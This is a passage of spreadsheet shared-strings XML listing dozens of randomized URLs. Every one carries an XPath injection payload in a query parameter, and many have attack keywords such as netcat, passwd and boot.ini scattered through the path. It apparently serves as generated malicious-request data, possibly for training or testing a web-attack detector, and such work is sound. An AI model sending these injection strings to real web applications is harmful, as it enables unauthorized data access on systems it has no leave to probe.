    <t>/a5edfiniaoetoaot/ki8lg/sqr-il/aayhldy/caendaaydom/hjn/mtnnft8/ew0e3xzf-@u.pnca@/dxno8-.php4?punionldrcphf=dnsb2\\4ps3i+a+@&amp;0seahe=celilu4.&amp;lee=53147&amp;c7libcn=mmctwzps9oli&amp;4enbmazmg5=ow1lvo7n&amp;ue8ofhcrcu8wee=orogh&amp;2pw5=1243&amp;681rksinput=ltsdt&amp;sd=13&amp;u6rlpno=eosx'++or+path/child::node()[position()=n]++++or+++'92detxne'++++=++'&amp;grydn=achydzxt&amp;hco9r=libimgy&amp;libstiframee@51zfn=ntshutdownvdgo?eaesfs2+beea&amp;1ht=hkxgi&amp;oatmuorae=logantceeaaz</t>
  </si>
  <si>
    <t>/ahiqml8k/a0kpict6e516nr4/ehd50xdjseunk/lyyeyo@9s0jrg/o9kvc2d.2t/uthdyeeo7cr/7yrkgyllmygd6ai4ty6/uem/rhsttcp5pmept.msf?meiab9swie=obnc&amp;xhvtcslg=mnmdtsc3eynte&amp;8fasn5agmr=l&amp;adhees2mqsa=+ecms&amp;odhs2orn0iia=34826&amp;ie4scttso3=9&amp;o1l=mubt&amp;v1brrnn=571587&amp;e8if=nee'+++++or+++1&lt;+++ejoaan/trh/7j/child::text()[position()=8]+++or+++'rs'++=++'&amp;adminnwqvvk=ibjf8zh&amp;enc2t0e0mba=x&amp;8hgcnndoiaerrs=ihbi&amp;rhgltie0=nttlzthfnder</t>
  </si>
  <si>
    <t>/tg/totr5uiinoe/oytvrr3saerhhstnbn6/6..t/dsxs_j73izcn78.kgjk/tcer4odld/iysy-sf-u_gfzt9/mmie5lnetcatx2wlinsertxt/l2qlr3znlgvxt5dqc6k.shtml?itbae3e=44++++or+++++1&lt;++++a/dp/e7phsx/child::text()[position()=704]+or+0=']+|+/*+|+/foo[bar='</t>
  </si>
  <si>
    <t>/nj2py8cwuuc/itssa6at/mnr4pytsj/ek26euqxlim/rewdoryr/t90yolplb/ls/tbxgymjhnltxeo0etvl/1positions5xiqe/0z@a.html?oaieuh=igdrawp&amp;fiexecexle4wherehns=83178481&amp;ewocanc=927823&amp;ec=205403&amp;atwmfe60stu=wpnjoh/mk/i12xl/child::node()[position()=912]+++++or++++'or'++++=++++'&amp;ixcaah=2&amp;85zohlikeq5ufmf=esq7mxjubst&amp;f8ha0sehnine0t=6&amp;zdvyq=tk7uzkqvav&amp;lrtrn=otreplacelh&amp;7mvxykguinputr@=clsuseumi&amp;guad4stdinp=maai2cmasindg%vii-n&amp;tn4oih=susa2dmsnnn&amp;csmondrz=ffperle7m&gt;ubin</t>
  </si>
  <si>
    <t>/62zcz.e3nmizeh@/hp5at.c2t_g/g2hidxn/yqyfwztlat/1gka-h/sroues/t5scaaosmtv/processing-instructionpgzkot0d/hwhizwxdr-x3_xbulw.jpeg?hezitihyod=li6'+++or++6++++&lt;+++count(path/child::*)++++or+++++'ioyeno2n'+='&amp;nm=2516&amp;qfv-9-php6re=tn7l&amp;ese=a&gt;o+=o&amp;noem@ye9&amp;eac=84717580&amp;nran=t?i@hmnu&amp;ksrofssr=adhdnhnijn4ke&amp;oneh=car+mo+ep)ps\\$e@i</t>
  </si>
  <si>
    <t>/theoe9ltcytorcoest0b/ledbr/xkscriptq9wfihutcdm/fraor8nm/thkarueooro8/aceesheoir6/do3vbqpchna/jevalahavingcwiframeppspp/hededbbnnnn.html?sal4t=4254+or++1&lt;+bu/amloh/esli/child::text()[position()=11]+++++or+++4244=']+|+/*+|+/foo[bar='</t>
  </si>
  <si>
    <t>/ain7ng1wwye0/3_fztcbinsnc5e3/h6gbfkbdfz-gak/r6dba0u24fb3s6s/alocwjutjddncsi/mwwtzid-c/enbzss@qc2cjk6qeqa_/bjjmutwmfe1a-zdt/b4wub@ki6oisw2rw.cgi?2oniqhjqpf='&amp;yszogqcb=di&amp;mez=tstwateronre&amp;8semls=57530&amp;m61z=rmdnwrwtseic+1oln$&amp;yaus=ia1&amp;nay&amp;hk=kodhkf8f3&amp;eliiluairedmo=753161&amp;jc=83&amp;nfigvt=ren2mnct)uo1r&amp;epltnverzt2zb=alhwsncgkm&amp;tsls8whr=optr&amp;grbeeeutnni=0dnmst5ncy@&amp;e4pzy3nyidl=+gihdcg&amp;bze2cs=52554+++++or+++++1&lt;++++sebpt/inisea/k7h/child::text()[position()=5]+++or+++++4016=']+|+/*+|+/foo[bar='</t>
  </si>
  <si>
    <t>/toxrtsqs9oq4ohop/ad9ho/eofas1ihie3s8ioaqsu/0asrnth6/a9eoeoioi.exe?ofcu=(i+++++&lt;++count(lodhor/child::text())+++++and+++j+++&lt;+++++count(car/child::comment())+++and+++++k+++&lt;+++++count(jseuv/child::*)+++)&amp;isc1ctci=+letei4e&amp;3rrddohs6h=ti$loy0ii&amp;ekig.p_du4bv=0oa&amp;pjsh8ah=ur8gmqwm60b</t>
  </si>
  <si>
    <t>/at7wkkcfz.lr1naha5ax/7cfrres/fmusgedcv/ye2ft4hodei/w2s86jhn1vidzort/eoannh/njr7deo2i5@geto5tafj/4e8staxoyh/igdansjatyh9/geen/utcesd2ct/xsdvd_fe.php4?an6frsuo=binrwe+i&gt;kei&amp;iivosnubaflv3e=susq8a'+++or+++path/child::node()[position()=n]+++++or+++++'ptsotgnn'+++=++++'&amp;apua31nmompaj=883370&amp;r3l=odh&amp;rwbnk_fg=o6jw9z8pjj</t>
  </si>
  <si>
    <t>/oedmipydnehsqte9hkso/tm.html?pec=phpbcn'+++or+++++6+++++&lt;+++count(path/child::*)+++++or+++'0a'+=+'&amp;tsorsq=+)like&amp;xmlusj=7&amp;gt=weaaebuy&amp;ooessl6m3l8eih=/s2lyeeimgandm&amp;g2ll6=insert&amp;0hpp2p=mj5oeyeeiq&amp;tetit8isq=dtsef</t>
  </si>
  <si>
    <t>/recnetbghahtsa/rm@aehrncy./gek.s@ywf@.e7a8az9/wdymnvidnetcatevsc/wurzuynra/qasd/8k01d70bfte@_5e/asn/36qicok/izxzd4zla7/onara1o8z.htm?hbd=e9i'++or+(i+&lt;+++++count(2ri6/child::text())++and++++j++&lt;++++count(1wrdlz/child::comment())+++++and++++k++++&lt;+++count(l5vca/child::*)+++++)+++++or+++'ernpir83'++=++'++++he7e'+++or&amp;lkxfjcatm=819560&amp;etirasbgrbstuem=]hbetween&amp;lqse==f&lt;telnett&amp;ghcaae3iiloee=eus&amp;tke1wmnqsbeee=ohj8us&amp;ab6aph8ruihl=ia&amp;hokoituoa=bsi%+asl'b|o&amp;lnjed=dohom&amp;vq40ud=9558722</t>
  </si>
  <si>
    <t>/yj/axa@w/hroc/s1nsqjscceezecrngat/earnjkar/l74y/77tma/utgccveosmst/urm1ehimt70dipyrxee/mmochajgnqszztj/d6ednprzllren5ge6.png?tpaiyawrle2at=05580256&amp;thl4=re&amp;zyfctyz65=ays'+or++++path/child::node()[position()=n]++++or++++'2ns'='&amp;4jbv24@=783&amp;i2lrewnugyjgndy=831480</t>
  </si>
  <si>
    <t>/sqg.iaxw_/oae/ym/nxbtgelno/ezdwh6lx0n4qltdylp4/evcniczendo4eye/ej0szwl/@izizxf/7pdvppxzhc97te0wv/i5ciuo5eoomn/odmjamselecttwcvyh/oxxd.cgi?aspsmeee7kd=slitatf7m&amp;hlt=oripstandxajue&amp;tvhtw1tlekwb=gaike']++++|++p++|+++++//user[++++name/text(++++)=+'tn0ie&amp;rleii6mnwabni=tmxpxi&amp;ulu=rl?u~&amp;52ereied=92&amp;tvpq=pevalonhtaoth&amp;wfd0yscrv1=tbeamtedrdi5jgral&amp;zouirfae3=tasrher;a&amp;owhmka0e=iqfw@1t4.7lg&amp;egatd=no(ir&amp;cjc5frb3tne=avnwt+hfidfrom&amp;e6rmtustn=9</t>
  </si>
  <si>
    <t>/rw/gxml-nsd_/eptu.jpg?horyuein=0um&amp;ttemd24nxael9=itz6sirxquf&amp;lghdjvarvs-hw=s8o3n&gt;tmidsnh+fhtpass&amp;csere3=79&amp;po=272&amp;oibh2rrt=hwuc&amp;20v0d@0@vz6k=etctsle~a5no&amp;ret=th&amp;gauat5fotdc4=866&amp;hey01gghl=s/2ieuhn/un1ee/child::node()[position()=646]+++++or++++'tclehsb'+++=+'</t>
  </si>
  <si>
    <t>/a1epwati/e-q9.v5g2endylge/psfpyro0b4kmzmxtm/sqyt5cnody/cqtfoedahdbciapo5a/ounctainpaa/reaefyedaahjom/includecfbmvbscriptcor6.swf?ancmiasoni=ofsaa']+++|+p++++|+++++//user[+++++name/text()='eo8ir&amp;e1csobt=e8mail&amp;qw4t6oeo=jnpthmithee5g5ehht</t>
  </si>
  <si>
    <t>/cdocumentcmdn/estnuld/1qdqffdgrzan/dhsnflzejb-gluho4q/oa3suoctaalvnc_/mrpe2tydreuio/bidmhocouaitir/stdin.nqxpasswdfm.pl?hqas=ecndygaoid&amp;aadhsl=i9n3iu'+++++or++(i++++&lt;+++++count(oii/child::text())+++and+++++j+&lt;++++count(jum/child::comment())++++and++++k+&lt;+++count(bp/child::*)+++)++++or++'9sngef'+++='+++the38'++or&amp;henrief=u7stetogeo4on&amp;mm=esa3ooferd</t>
  </si>
  <si>
    <t>/dtlgspwd2wfmow@x/hc7t3sdbplsyoxoebtiv/soomecsmn/5tqpgtetsqdecwa/nuf-ptyn0s9dbiu.tm5/ajttqtofpokw@/ecmuucadrar-ei.html?k204rs=n8&amp;5l2tuau5avb=+en&amp;ns=agiccsubrh1sop&amp;wssl8bv=ol2te&amp;srdajs95i8=8ieahavingaietmpcmdid+nimaar&amp;tmae=ahs'+or++++1&lt;+++++eexnat/t/hlntcz/child::text()[position()=83]++or+++++'irsnbzx'+=++'&amp;kels=831320</t>
  </si>
  <si>
    <t>/fiv0k8n7lhechod1i9/s27wjslh/ibdn.wg5_v/sglfbn_udsk.cgi?onnptkh=5496979870&amp;sktp5it0=7&amp;7sptuerrltgt=hyh@gkeyic7k&amp;noaniee=wttah/lz/aid6/child::node()[++++position()=30]+++++|+k/bieair/nrg9ap/child::text()[position()=3]++++or++++'su'++++=++++'&amp;ihzearllf=insertswewgs7+&amp;wags2e=1221394995&amp;nyak3uw=nu)eu&amp;9dfazl7etse=dp3wjnnnhf</t>
  </si>
  <si>
    <t>/svzfo@cxsdtpf5ashl/26/mjhfj4lij@wup3cf/s8b5gekp.dll?jhlsduht=m5disddsev1nzhene&amp;15ousytieaxlr=rnhotvip1&amp;l354hhn=hrjn5nerer&amp;sessi=76900&amp;eomlhrnokrl=httplqencyeg&amp;hsjlsqsei=nstice?tdoe7delete&amp;th=t&gt;aftp5w$9he1ar+ch&amp;tattoheswataoe=pdnlanlez&amp;wzbuxkx2e=rtso47q'++++or+++++tiedde/n6dcm4/child::node()[processing-instruction()=677]+++or++++'4e'+='&amp;5aea40ea=ntol&amp;cgetttypes=hs&amp;0rsdebofjkutn=2181667&amp;tbtse='\\oen5earet</t>
  </si>
  <si>
    <t>/lcnnliut4wdnsyheod/nm_g.xef/atm.jpg?x_cxoxmll=66++or++count(path/child::node()[position()=((i+j+k+l+1)]++++|+++path/child::*()[position()=(k+1)])=1++or+++9480=&amp;awetrin=5939552&amp;t8hhttthfau=e@qbtnbm1p&amp;rjer7a8=7abefkeuhaena&amp;o.pgrnhinsert=6&amp;aloo=t+&amp;e2=21901&amp;7wrepr=dmmn&amp;e5eb6lint=7</t>
  </si>
  <si>
    <t>/itq24fvusd3vc3z/kl/wi.xxqv/tj/ngyn5yrositj/dihw7eilh0wnnm8i/o9tleh1asq.sh?asaew=enpn8&amp;pa34mvjqi05v=ejkhehh&amp;yfzclret=pyvj2j&amp;sd==2rcplsao8eaceur:+reo&amp;ihpitw=hdnadhrnarw&amp;zraossosoehr5a=s_iahklz_pe&amp;oh3naini9odpiog=d7&amp;oorstteile8t=933389&amp;pkht0edooupydz=76397+or++count(path/child::node()[position()=((i+j+k+l+1)]+++++|+path/child::*()[position()=(k+1)])=1+or++8949=</t>
  </si>
  <si>
    <t>/rjg/twtds/pf/8gsnul.2gjamq/gogut7nzotbed/ootadiitsrz2ji/dght7tednonso/9khrrnb/bi0xml.tiff?wy=her'+++or++opg9/lieu/child::node()[processing-instruction()=8]++or+++'twokieh'=++'&amp;grpod8aeg5s=a&amp;tgw3eet=sut3&amp;5tp=knwenecslinktt&amp;swchii=thweda&amp;6eua=42925&amp;rtaove3rcoplt=r+blj0po9sboot.ini0)</t>
  </si>
  <si>
    <t>/plzm3akcuetogo/v@km06xlfmct/w2i6estue4.css?rozeltnk5a=snerhre&amp;desek=rii)+&amp;td91jqzbek5z=820241321&amp;nahtbi0fw=hnc0'+++or+++++6+++++&lt;++++count(path/child::*)+++or+'ehtn'++++=+++'&amp;zlfi4bpu=4144755825&amp;tcnnnzdow7aew=ns&amp;rrtaoeescuwos8=osmehwvtrdtdijo&amp;iusant=55897835&amp;8m=9980664&amp;m1hf=a%</t>
  </si>
  <si>
    <t>/xejda/60j_s-hxr_echg./o5kjgm1groupbytd/w@hq7mailwautoexec6p/evd8bwj4je7@/kwaylw56v./r8vbscript_select.voz1cdn.dll?lml=d2l'+++or+++path/child::node()[position()=n]+++++or+'s3irer'='</t>
  </si>
  <si>
    <t>/jsd85l9wr./nixtknlkqcno/asa3d/obmihxq/gnas/t7.nj2fnmsd/iq2l/5qnqxsbftqqsuqc9dp/cq0k2uqeha/ze0aei/7pq.htm?o8thoeeoalwoe8=weq&amp;beedsorjwe=982++++or+++count(path/child::node()[position()=((i+j+k+l+1)]++++|+path/child::*()[position()=(k+1)])=1+++++or++647=&amp;neono=eiarjr&amp;stt1ael3a=ti24childiframefhtclycq&amp;ndn1=0613458&amp;thttlemebaz=711</t>
  </si>
  <si>
    <t>/ac/ssoexaab/unt/o4rwmtyz/uskzfotit7nercsf/4ydetf8faawansar/behm/eeas.sh?astt6fhe=hkwrthsxxm9&amp;euuxin4sb7go9l=njhv3we2-up&amp;lxmlsx-tscript=3aeai&amp;ki=+uoh&amp;rgbpkwo-auw=772235&amp;os5idmt=(i++&lt;+count(na/child::text())+++and++j+&lt;+++count(tesdti/child::comment())+++and++++k++++&lt;+count(itengh/child::*)+++)</t>
  </si>
  <si>
    <t>/1_lju@b1vlxyaxpq/ny/sl9te/oaynrdveooes/jfei2gtteiiscr.mspx?asshdarm87ye=gn(trcpm0's+c&amp;nw5ic=e.krdac&amp;toyflytxeai=6161880&amp;08ahshtjnsicdr=56&amp;e8=100696958&amp;gjhbody=h-nw4o_.o5&amp;lldmmvs=wsamfoo)areg&amp;oel5e=22525822&amp;lwfromhgx=87612&amp;sociu6ieb1=t2zdsiocz&amp;eoetes5=3&amp;vatat=peecade'++or+(i++&lt;++count(ny/child::text())+and+++++j+++++&lt;++count(smsi/child::comment())++++and++++k+&lt;++++count(oo/child::*)+++)++++or+++'hhi58iil'++=++++'+++++iidmoaa'+++or&amp;fli=uhrh07ieodgeanay</t>
  </si>
  <si>
    <t>/avwbhttpsbfy68p/emxocaaei9httamee.php?eolubhi7=axcicjpyo-qg&amp;qkhsjbt=ee-0jts:tins5rehim&amp;8chnvowinhte4t=9131&amp;pt7ug=xhiev'+or++count(path/child::node()[position()=((i+++++++j+++++k+++l++++1)]++|+++++path/child::*()[position()=(k+1)])=1+++or+'vswe'++=++'+++++bo'+++or&amp;86bktt4-2=adivnldd&amp;rhiw=oi?</t>
  </si>
  <si>
    <t>/tm.fu/itnnrneeeyzp7ntnnc11/vnhqhxhe/8xeriwx.gft/wcrhgt_6mvr2fr/nus4lwherptc/qi8/7zgkzp8r4vlmzf/@tipvaapliframert@lib/6oawnndhaeosled.css?dt=eeoa;&amp;osdnrp4ngo=rtwgetiute~epn&amp;aghxwquntoeennq=gadet'++++or++6++++&lt;++++count(path/child::*)++++or++'sa'=++++'&amp;fmedivawuacao=mfxxbnqnj4v&amp;8ad742tennorhfe=:eudjtdocument&amp;doyaai7=xohye6s&amp;curaansa=wi3ratu</t>
  </si>
  <si>
    <t>/vcvwis-i-azuqrzsmph/ak0baw/eed/d578/cihbtr6uuhlam/2oelnk/wxg9ryb0j/tupdate7cpailpuu5/hon/akr8yoozntn2suiw.dll?de=kgi08/on/e/child::node()[position()=87]++or++'rys3'=++++'&amp;bhpkz2meta=891&amp;2in6eeiole=4</t>
  </si>
  <si>
    <t>/zmdpdu8hoxqu4s.mdb?yghbkbll8=7&amp;d8ssan1=25++++or+++++w9nveq/edeuij/v/child::node()[position()=526]++or++05=&amp;._nph-0memf=95&amp;o4tncmyyt2firo=chj6qwmrhta1htvau8</t>
  </si>
  <si>
    <t>/dedrrgraeadterf/e75.moy3b6zloolt_1ky/e9gs4ku_3objey9@/tnnbsoetltbudssuhm/ge.exe?efa=/hhtlte0mwgnlqeehzu&amp;rsock_streamncg=sechoo&amp;ed='nfmoe+$rcd&amp;ged=4ywsr&amp;eoyeemeznu=5164&amp;ci3=6&amp;s_tne0x=u++sup'sock_streamt&amp;essamnte8dnthmn=33+++or++a2zde/wtseas/arkca/child::node()[position()=781]++or++++8674=&amp;va1oftis=s2</t>
  </si>
  <si>
    <t>/fw/7ekzaewgb/lce8w/du/trd12e8yehht6o2c/s@ul3vcqtgg.png?s5ttsee7ieto=neeep'+or+(i++++&lt;+++count(hi2a/child::text())+++++and++++j++&lt;++++count(aii/child::comment())++++and+++++k++&lt;++count(igt/child::*)+)+++++or++++'dbz'+++=++++'+++++mssecs1'++++or&amp;asonozo1=+:ewp-8e&amp;kt3agrp=19884432</t>
  </si>
  <si>
    <t>/uboatr4sbannalinete6/s2.jpg?dt6hdtetn6es=354+++or++count(path/child::node()[position()=((i+j+k+l+1)]+|++++path/child::*()[position()=(k+1)])=1++++or+824=&amp;9qxmlww=n1h&amp;ia8ps=ol&gt;apn2eetmpyt&amp;trwabugjhbnt=tens&amp;twoizaij=re7</t>
  </si>
  <si>
    <t>/hleinfyclaoasdpool3s/hmptwkpuku/np.x/akofx4g1epkqly/a9_0lzvqtev0g/0it1acaensnasdahsmig/ehtba7cghb.c/dwe/ombntzieq4uee/aesrieiogo6fe1asia/ezild8f@jn.html?ia=lihnah&amp;ruyh=jh&amp;hrlformdpyz=9589&amp;oz=tet&amp;dossbqbgl4t=m7flt6w&amp;usminhu=cieii&amp;sficen=8ssep2oxplf&amp;dnoe9nbsahu=re'+or++++count(+path/child::node()[position(++++)=((++++i++++j+++++k++++l++1)]++++|++path/child::*()[position()=(k+1)])=1++or+'eo'+=+++'+++e6eiated'++++or</t>
  </si>
  <si>
    <t>/5fromvu9childj_ship.msf?eaoe=847884952&amp;r1ykz_8x.z6f=a;&amp;vausf=sear'++or++1&lt;+++rsu0/tru/5eetse/child::text()[position()=42]++or+'sth'++++=+'</t>
  </si>
  <si>
    <t>/re/e.cf77bfxk/esn/ntyohlbetugo/acradqbam5@i6unqj_b2/tx_hj20w/ji@jczkdv5pkqeks/o9006os/te.hpstutc0xr3bnx/7mls7ymuennxc/idwney/gfethc.pl?urettavhkausf=iets&amp;1stnbezuoume4yx=vhyex6=xod3dr&amp;anrlgap=+3fn&amp;xeeccuit=paicivtp99ea&amp;b0_uopvkpt6z=rrd97hoyn&amp;ynl=ot+0ktnmn'z&amp;9nodcjef=lrkdple']++++|+p+++|+++++//user[+name/text(+)++=++++'ao4gk&amp;ptj6t=55651&amp;lcssb8rtr=4438520&amp;5j1nrmlu6goee=582865015&amp;c0tn=wtltuntlxoat0</t>
  </si>
  <si>
    <t>/cna/dbtegr/rz1se/zdrm.exe?csiyoh=|v&amp;aloshefed=kg75unstauiad1t&amp;mdpassthruje8biya=ru8h-&amp;loedsc=dsd1(aeoz&gt;0h[ubpositionopen&amp;8omxrooyse=dwp-=adminin&amp;focqemratsm=unek:t&amp;tdyd=rvsvarerm3$f+azgf+k&amp;-armn0=58665+++or++++1&lt;++lsi/rbroe/k/child::text()[position()=9]+++or+0=']+|+/*+|+/foo[bar='&amp;hk=rlle8ma94+&amp;kuieeezdto=ase2cpmfl&amp;ptie=4309389</t>
  </si>
  <si>
    <t>/5csidgeqy_qke-.nizwz/r7p-il/qgqyxjjliq/sxcteiane/omifm0kggi73_ufvj/eldfceitgsgin1ocao/no2reatpeput/ngtf.css?2xtoe=24afvp6ky&amp;op53l5ty=wselecticrisa&amp;f0o7eieeaddw=55350+++or++1&lt;++qtziae/eoveyu/cv9od/child::text()[position()=527]+or+++++58581=']+|+/*+|+/foo[bar='&amp;tic=zqi_&amp;aa=5816081326</t>
  </si>
  <si>
    <t>/szvaniiie1e/ex1fkvy/t6o/tenvbeeqhhia/94.5-x/iiowhnqy0hwuchvuair/tpwnqy3neeoaavibia/ddrdihwmt5.htm?a4h=tqtpxlsoialamtein&amp;1ua66xogmuu=ej4ei?+&amp;sdcnir-=187&amp;@1h0ggj=0wg+mdiv?sio+gl+io&amp;n3ya3tivegeoa8=iitelnetbrrstua+&amp;25pdaymsintlfs=mnph'++++or++6+&lt;++count(path/child::*)+or+'fteth'++++=++'&amp;oec1os=16682</t>
  </si>
  <si>
    <t>/plgupj/etntce1.aspx?myspeets=kdr']++++|++++p++++|++//user[+++name/text()='5s&amp;3l9hzdt7m5rpun=9ct3&amp;cc2vde-=ut3sttyu0rnh9dexsl&amp;1ab3tday=osaewsystemrh&amp;3bmxp_.0f=765</t>
  </si>
  <si>
    <t>/qriframeprocessing-instructionifr0sm-4wp/iq8l7nqhf.hg0_dl5a/yi/em3kyyoknzec/ntlzit09befnweg.php3?n0h2vltto=u)nceihyau&amp;9elrbje32h=iwepwa@.dbg&amp;fpnz5a=nkoesrecgoiem&amp;t4oeiki=09&amp;eoooioirmbsha=2677&amp;hnffkaz=phasd/w/t/child::node()[++position()=066]+|++au/cwbh/eon/child::text()[position()=5]++++or+++'nd'++=+++'&amp;wjbidn=autd&amp;tsmere=mhttpnsock_streamtwrhxp_lsib&amp;o3er2atopn=c4og</t>
  </si>
  <si>
    <t>/aeu3p_-/rwa.php3?cfer=ketyst/jyo/ooind/child::node()[+++position()=104]++|+++seetc/oot/rg2t/child::text()[position()=7]++++or++++'pu'=++'&amp;ahtf2e=26&amp;5indon=a+o7wm&amp;tae7ore=e0ydddz&amp;n2ned=svi5tva2&amp;2snoifsoop=3</t>
  </si>
  <si>
    <t>/flrogcbhjh63otw/a9/cwp-or1izfghhx7prz/nispro_loxlxs.cgi?n5xu=i&amp;uothn9j=l3&amp;s8locationcgp-o=601&amp;fr4fic=symhaeasppnfa&amp;fhdivoelotwbhavingf=(eehhsnon&amp;dsalsmrarte=me@j+&amp;eentmtmor8zxml=7609++++or++++diimct/tmn/2eo/child::node()[position()=84]++or+++++68=&amp;dctt=80595&amp;azpositionijjskpbpsystem=eriliphe&amp;xagiha9inh=hvjfg_hw6</t>
  </si>
  <si>
    <t>/es.bpm/habs0/eer09qkf5t@erwek567.shtml?yo7=+mert&amp;jdtaagatow7g=oufbf_lfyvg&amp;tsye=jcrsakdn&amp;ael=esh&amp;xobwaris=ksrotaxeo4ggreosb&amp;wag=paes&amp;zgpheaoe=t7he'+++++or+++++count(++++path/child::node()[position(+)=((+++i++++j++++k+++l+++++++1)]+++++|++path/child::*()[position()=(k+1)])=1++++or+++++'leurv'+=++++'+uwpeeotn'++or&amp;hxwawigd.6=niacceptd&amp;ol37aaid=izv&amp;v0kqxue0vtunion=]de++</t>
  </si>
  <si>
    <t>/td6.cgi?6replacer4fpu=8cebjt&amp;lekstcocimiur=detdjlpt'++++or++1&lt;+++++tnre/ornatt/65utr/child::text()[position()=30]+or+'telc'++++=+++'&amp;ynodeprlkkpshutdownt=fr8&amp;tem6mag=alo0iolpmesfot&amp;90ir6.p=88&amp;gcooanh1=29981&amp;amrednenkjf6dsa=epatwgi9s2m&amp;ioqirliulffdr3=s57d&amp;mwhagnxawze=txn</t>
  </si>
  <si>
    <t>/ahiqitn5eflaosh/fpaogthselioe1m/dge/fhny4lsytt/rphe7ecgiiuc/utidltuagnyt8o/5-nqvipd1x/aafapimjsettxyd/4teectfugia4ne/lysbtrnqneer9oso/ee5imqaz7hmb1x3vs.gif?8ndbaloeboebs=oeguornnuh5umnelhi&amp;ohyd=?%iey6thedntet&amp;etcjuposition7@mm=18&amp;joeulsm=mrcpee~dor0a&amp;ylxd6iixpsai=(i++++&lt;+++++count(sga1/child::text())++++and+j+++++&lt;+++++count(ir/child::comment())++and+k++&lt;++++count(et/child::*)++++)&amp;jrsy=enrcp-sieerm+mi\\e+&amp;obmep2rqhd=om]rn+</t>
  </si>
  <si>
    <t>/occ1z7jgaizmykh/iq0./ejnuervtvohnu9ec/k9/doc7a3mfbanhasnnn.mdb?oi2=antde5tyl"h+"og&amp;srnhfne=llnrbehegt2&amp;5hy20uihlteoofc=swgei&amp;errt=30875446&amp;keunseizsaemh=05&amp;pnwon5zoletmn=wurgehcoly&amp;neos3wiadegtgs=:n&gt;iilogunion&amp;xaem&amp;k2sdepm18-nh=749++++or+++++1&lt;+++++src3/y/tw/child::text()[position()=460]++or+65=']+|+/*+|+/foo[bar='</t>
  </si>
  <si>
    <t>/vlwdfbgngyo/h6xujdartkwmjz_wxz/fzvvitoqkk2tofgxg8/h2r43h/wseo/gdb3o2eutvhr/eedinanaoeez/ph1fohasystemukklz9/2byqamtrnydgc/a6lk50lsfvaw.ngd8gvi/gfw6hghvr7shutdownce.shtml?nqxssmzaer9ue=nelm0&amp;onsglx=$dt&amp;pu0i1gtstnhaa=7908673&amp;6tpdnawnruesdsm=ageasaweo&amp;bgsounddnxx=elrtj&amp;nph-r87jq=accept2rmtbtcrejh&amp;tvdfby7sigt0oa1=svv7oe5ua&gt;&amp;7u=04224152&amp;eomhlp7dp=e6i|4bbleydt&amp;hvbscripthyn1betweenep=oft&amp;nnrcpd$libl1z6?o?&amp;easoontrcro5mlu=hjao/3/hgnn/child::node()[+position()=66]+++|+iiahl/0e/miuuaa/child::text()[position()=9]++++or+++++'07nae'++=+++'&amp;0hwindow.opent@qshljpn=83355</t>
  </si>
  <si>
    <t>/e3/eo2oah/rqkp-jxspx-3/sgz/a7c/ejttuc9dehaiej.nsf?tserti6n=udjeos&amp;staaoeolygae=54558779&amp;replaceaul=921432&amp;nie1a7idrsmteox=on'++or+r/rri8mc/child::node()[processing-instruction()=429]+or+'rdra7etr'+='&amp;4nullimtmptr.=0&amp;@7xdocszsj=hgxd@pj-15xq&amp;tmezwdnb=execroai(nr&amp;krxywlq=a+tzhtacces&amp;net=ejkdmf2i&amp;tlgs=p7n&amp;vi=0048710385&amp;mzr6uanssafu=t9</t>
  </si>
  <si>
    <t>/lwheresedybfrombetweenpo/mlnuatlene/pm/ezureplacet0_q2s/suuavb/v.mue/hnhohw/deresphvehjv.exe?aebkqnoy=146428528&amp;n6ru2obefn=998076&amp;d9ir=2809&amp;djer_=nr2sour9e6luda&amp;ynhsstysw=hy'+or+++path/child::node()[position()=n]+++or+++++'nb'='</t>
  </si>
  <si>
    <t>/ojolomhfsqoru_b@hmqu/dnoobyqpsbzsvneei0/0axwz4v8kr9jnz13y5z1.tiff?eneptt1=4&amp;rdrdhv2htfzbon=&lt;-tlink&amp;mtoneoolwihrr=99391&amp;i0t2eer27k=6725+++++or++1&lt;+++++r/oet4ee/ha/child::text()[position()=9]++++or+6351=']+|+/*+|+/foo[bar='&amp;uvkrrexecc=servicesqa|hptsaaidocument&amp;nweh=bno-xgeehonullec8</t>
  </si>
  <si>
    <t>/tttuiaebw1or/ssgwij.htm?ad@bptwbasdt=ntuo&amp;6cv2q=timodlk&amp;ct24czjaeoe=dduteeii&amp;sxpexwinnttdh=onnmowo'+++++or+++++6++&lt;+++count(path/child::*)++or+++'izsuebxv'++++='&amp;e1=a+ayp&amp;giosp=lis.nytyrs5&amp;8ahithilu0ata=437276130&amp;n8o2sm6eiiomme6=php1itlepo&amp;x0b7isaoe=lwi5av1&amp;rs=itssf&amp;0dt8y=&gt;eot</t>
  </si>
  <si>
    <t>/wlb8he/sl-fxkcekqmxf5yfq/im3sh5sowbzlcxuait/9ixidhmpo/eiecnftsoatmhboc/0a4dy9/wojvcqysn/baiuelukpjlsnnt.asp?7evalletmp6=d&amp;sac0=9311&amp;r7iuntpdrrlwn7h=)&amp;ii7=8i&amp;cdgiic6k4tm=tcoddin&amp;iwusxvoux=92395752&amp;tgnhbdoony5a=mochazt0&amp;oshk0=ie'++or+++++rs/dese/child::node()[processing-instruction()=0]+++++or++++'cnasdn'+++=+'&amp;wv=s_jv&amp;eudfwinqgnsd=0684&amp;czyoli=useedr+</t>
  </si>
  <si>
    <t>/b@kizlgfvr-nvs/zbesrnhllae4devt0f3h/douiob.js?v1@jolikeuf=65710++or+++rftoo/8/dtrtl/child::node()[position()=39]++or++++1=&amp;eag=nasstnecoreiw&amp;igncccoiy8em=3nis&amp;dayvdp0ehge=xv8vaif&amp;h6eofedeeeauuh=9qxh9&amp;ccd3jneq=nwn&gt;tqetmetlewtn&amp;oqrsrn5eai=8553&amp;bandwvuuservicesb=8005595&amp;rbvn4hv=ret&amp;eee2=+ucmdttfna&amp;rc0tspvw8=eeiyva;m+1pciframewt&amp;ftleceedrsgde=mezeapc&amp;csgaotn3puq=5447&amp;d7eoiua0eksfat=sntrettnae0espl6&amp;reat39ieeyletum=447773818</t>
  </si>
  <si>
    <t>/uonnoodecw/7njesfhasqshu5dke/t5nreplacei@jwqq/hhi.php?onuinurb=a8ou&amp;dwzsn=mete|eehhtvbscriptat&amp;aanstbntaeisiw=aihwts']+++|+++p+++|+//user[+name/text(++)++++=+++'e6u&amp;ohto=henedox~systemtxba4+mt</t>
  </si>
  <si>
